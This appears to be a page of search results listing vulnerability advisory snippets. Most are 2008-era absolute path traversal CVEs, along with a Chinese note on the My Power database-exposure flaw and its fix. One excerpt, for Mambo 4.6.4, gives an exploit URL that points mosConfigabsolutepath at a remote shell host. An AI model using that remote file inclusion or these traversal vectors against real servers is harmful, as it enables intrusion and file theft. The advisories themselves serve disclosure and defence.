2042 matches found
动力(My Power)暴库漏洞
直接输入动力系统的conn.asp的地址,如“http://www.asp163.net/inc/conn.asp”,在脚本错误提示中会暴露出数据库的真实地址及文件名,从而可以下载数据库。 动力My Power3.5XACCESS/SQL版 第一步,将数据库的扩展名改为“.asp”或“.asa”,我们已经在数据库中做了防下载处理。改名后,即使有人知道了数据库的真实地址及文件名,也下载不了。 第二步,修改conn.asp及connuser.asp中第5行的数据库地址,将原来使用的相对地址改为使用绝对地址。如:原来这一行内容是:db=...
FreeBSD Ports: coppermine
The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...
Absolute path traversal Apache Tomcat WEBDAV
Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag...
Path traversal
Absolute path traversal vulnerability in fckeditor/editor/filemanager/browser/default/connectors/php/connector.php in UNAK-CMS 1.5.5 allows remote attackers to include and execute arbitrary local files via a full pathname in the Dirroot parameter, a different vulnerability than CVE-2006-4890.1...
Mambo 4.6.4 - 'Output.php' Remote File Inclusion
.-----------------------------------------------------------------------------. | vuln.: Mambo 12 / 13 14 requireonce$mosConfigabsolutepath . '/includes/Cache/Lite.php'; ... ^ no comment.. RFI in line 14.. exploit: http://host/path/includes/Cache/Lite/Output.php?mosConfigabsolutepath=http://shell...
CVE-2008-2045
Absolute path traversal vulnerability in SugarCRM Sugar Community Edition 4.5.1 and 5.0.0 allows remote attackers to read arbitrary files via a full path in the URL parameter to modules/Feeds/Feed.php, which places the contents into a related cache file in the .cache/feeds directory...
Path traversal
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the 1 CompactSave and 2 SaveSession method in one control, and the 3 saveRecordedExploreToFile...
CVE-2008-2015
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the 1 CompactSave and 2 SaveSession method in one control, and the 3 saveRecordedExploreToFile...
CVE-2008-2015
CVE-2008-2015 affects WatchFire AppScan 7.0 ActiveX controls. The vulnerability is multiple absolute path traversal via full pathnames passed to the CompactSave, SaveSession, and saveRecordedExploreToFile methods in different controls, enabling remote creation/overwriting of arbitrary files and p...
CVE-2008-1933
The CVE-2008-1933 entry describes an absolute path traversal in a Zune ActiveX control, allowing user‑assisted remote attackers to overwrite arbitrary files via the SaveToFile method. The vulnerability requires the user to explicitly allow code execution. Affected component is an ActiveX control ...
Tomcat: Multiple vulnerabilities
Background Tomcat is the Apache Jakarta Project's official implementation of Java Servlets and Java Server Pages. Description The following vulnerabilities were reported: Delian Krustev discovered that the JULI logging component does not properly enforce access restrictions, allowing web...
Path traversal
Absolute path traversal vulnerability in dload.php in the mygallery 2.3 plugin for e107 allows remote attackers to obtain sensitive information via a full pathname in the file parameter. NOTE: some of these details are obtained from third party information...
CVE-2008-1702
Absolute path traversal vulnerability in dload.php in the mygallery 2.3 plugin for e107 allows remote attackers to obtain sensitive information via a full pathname in the file parameter. NOTE: some of these details are obtained from third party information...
Absolute path traversal Apache Tomcat WEBDAV
Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag...
Absolute path traversal Apache Tomcat WEBDAV
Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag...
Path traversal
Absolute path traversal vulnerability in install/index.php in Drake CMS 0.4.11 RC8 allows remote attackers to read and execute arbitrary files via a full pathname in the droot parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party...
CVE-2008-1371
CVE-2008-1371 affects Drake CMS 0.4.11 RC8 via an absolute path traversal in install/index.php, exploitable through a full pathname supplied in the d_root parameter. This allows remote attackers to read and execute arbitrary files. The description notes provenance as third-party information; no r...
Path traversal
Absolute path traversal vulnerability in system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp in Alkacon OpenCms 7.0.3 and 7.0.4 allows remote authenticated administrators to read arbitrary files via a full pathname in the filePath.0 parameter...
CVE-2008-1221
Absolute path traversal vulnerability in the FTP server in MicroWorld eScan Corporate Edition 9.0.742.98 and eScan Management Console aka eScan Server 9.0.742.1 allows remote attackers to read arbitrary files via an absolute pathname in the RETR get command...
CVE-2008-1221
CVE-2008-1221 describes an absolute path traversal in the FTP server of MicroWorld eScan Corporate Edition 9.0.742.98 and eScan Management Console (eScan Server) 9.0.742.1. The vulnerability allows a remote attacker to read arbitrary files via an absolute pathname in the RETR (get) command. Affec...